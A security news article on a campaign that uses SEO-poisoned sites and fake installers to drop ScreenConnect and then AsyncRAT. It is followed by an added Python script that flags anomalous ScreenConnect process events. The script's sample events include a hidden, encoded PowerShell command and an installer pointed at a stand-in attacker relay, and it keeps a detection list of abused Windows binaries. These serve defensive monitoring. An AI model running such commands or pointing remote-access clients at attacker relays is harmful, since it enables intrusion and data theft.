Unknown threat actors deploy AsyncRAT through ScreenConnect, a legitimate remote access tool, in a widespread campaign targeting multiple regions and languages. Kaspersky identified the operation as a coordinated effort distributing malicious installers across numerous spoofed websites optimized for search engine visibility.
The malware poses as legitimate software, including OBS Studio, DNS Jumper, DS4Windows, and Bandicam. Users searching for these applications land on SEO-poisoned sites hosting archives that contain a fake installer. Once executed, the installer deploys a ScreenConnect client that connects to infrastructure the attackers control, and the attackers use that remote session to load AsyncRAT onto the compromised system.
AsyncRAT is an open-source remote access trojan with extensive capability for data theft, credential harvesting, and system manipulation. Because the attackers' foothold rides on a signed, commercially supported remote access tool rather than on custom malware, the initial access stage is harder to detect for endpoint protection systems that often allowlist commercial remote access software.
The scale and coordinated nature of this operation indicate an organized threat actor rather than an opportunistic one, running many spoofed sites in parallel. The multi-domain, multi-language approach suggests targeting across geographic regions and language communities. SEO poisoning remains effective because users trust organic search results and download software from domains that appear legitimate at first glance.
Organizations should enforce application allowlisting policies and monitor ScreenConnect activity for anomalous behavior: clients installed on machines outside the help desk's managed deployment, clients that connect to relay servers the organization does not operate, and ScreenConnect processes spawning command interpreters or other executables. Users should verify software downloads directly from official vendor websites rather than through search results, validate installer integrity against checksums or code signatures published by the vendor (a hash shown on the same spoofed download page proves nothing), and maintain current endpoint detection systems. The campaign demonstrates how attackers combine legitimate tools with social engineering and search manipulation to achieve initial access at scale.
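The following is an added example of the ScreenConnect monitoring recommended above; it is not code from the article, from Kaspersky, or from ConnectWise. It runs three simple rules over constructed Sysmon-style process-creation events: a ScreenConnect client whose relay host is not one the organization operates, a ScreenConnect client spawning a command interpreter or living-off-the-land binary, and a ScreenConnect installer launched from a user's Downloads folder. The client binary names, the "?e=...&h=<relay>&p=<port>" command-line format, the allowlisted relay host, and all event data are assumptions for illustration; check the binary names and argument format against your own ScreenConnect deployment before using the rules.

```python
"""Flag anomalous ScreenConnect activity in Windows process-creation telemetry.

Added example, not from the original article or from ConnectWise/Kaspersky.
Assumptions (not facts established by the article):
  - events are dicts with Sysmon Event ID 1 style fields
    (ProcessId, Image, ParentImage, CommandLine)
  - the ScreenConnect client binaries and the "?e=Access&h=<relay>&p=<port>"
    launch parameter reflect a typical client install
  - ALLOWED_RELAYS lists the relay host(s) of the organization's own instance
"""
import re
from typing import Dict, Iterable, List, Optional, Set
from urllib.parse import parse_qs

SCREENCONNECT_IMAGES = {
    "screenconnect.clientservice.exe",
    "screenconnect.windowsclient.exe",
    "screenconnect.clientsetup.exe",
}

# Children a remote-support client has no business spawning on a workstation;
# this is the stage at which a follow-on payload such as AsyncRAT gets loaded.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
    "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe",
}

# Assumed: the only relay the help desk operates.
ALLOWED_RELAYS = {"support.corp.example"}

USER_DOWNLOAD_DIR = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def relay_host(cmdline: str) -> Optional[str]:
    """Extract the relay host (h=) from the client's query-string style argument."""
    m = re.search(r'\?([^"\s]+)', cmdline)
    if not m:
        return None
    hosts = parse_qs(m.group(1)).get("h")
    return hosts[0].lower() if hosts else None


def analyze(events: Iterable[Dict[str, str]], allowed_relays: Set[str]) -> List[Dict[str, str]]:
    """Return one finding dict per rule hit, in event order."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        image_path = ev.get("Image", "")
        image = basename(image_path)
        parent = basename(ev.get("ParentImage", ""))
        pid = ev.get("ProcessId", "")
        if image in SCREENCONNECT_IMAGES:
            # Rule 1: client pointed at a relay we do not operate (or none parseable)
            host = relay_host(ev.get("CommandLine", ""))
            if host is None or host not in allowed_relays:
                findings.append({"rule": "unknown_relay", "pid": pid,
                                 "image": image, "relay": host or "<none>"})
            # Rule 3: installer run from a user-writable download location,
            # i.e. a downloaded package rather than a managed deployment
            if USER_DOWNLOAD_DIR.search(image_path.lower()):
                findings.append({"rule": "installer_from_downloads", "pid": pid,
                                 "image": image, "path": image_path})
        # Rule 2: ScreenConnect client spawning an interpreter or LOLBin
        if parent in SCREENCONNECT_IMAGES and image in SUSPICIOUS_CHILDREN:
            findings.append({"rule": "suspicious_child", "pid": pid,
                             "image": image, "parent": parent})
    return findings


# Constructed sample telemetry (not real logs).
SC_DIR = r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4e5f6a7b8)"
SAMPLE_EVENTS = [
    # benign: managed client talking to the help desk's own relay
    {"ProcessId": "4120", "Image": SC_DIR + r"\ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": '"' + SC_DIR + r'\ScreenConnect.ClientService.exe" '
                    '"?e=Access&y=Guest&h=support.corp.example&p=8041&s=11111111-aaaa"'},
    # suspicious: installer from a fake OBS download pointing at an unknown relay
    {"ProcessId": "5532", "Image": r"C:\Users\alice\Downloads\OBS-Studio-Setup\ScreenConnect.ClientSetup.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\alice\Downloads\OBS-Studio-Setup\ScreenConnect.ClientSetup.exe" '
                    '"?e=Access&y=Guest&h=relay.attacker-controlled.example&p=8041&s=22222222-bbbb"'},
    # suspicious: the client spawning an encoded PowerShell command
    {"ProcessId": "5610", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": SC_DIR + r"\ScreenConnect.ClientService.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    # benign: a user shell under explorer, unrelated to ScreenConnect
    {"ProcessId": "6004", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS, ALLOWED_RELAYS):
        print(f)
```

The relay allowlist is the rule that gives the most signal with the least noise: a client talking to any relay other than the organization's own instance is either a shadow-IT deployment or an intrusion, and both warrant a look. The other two rules are noisier on help-desk machines, so tune them per host role before alerting.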
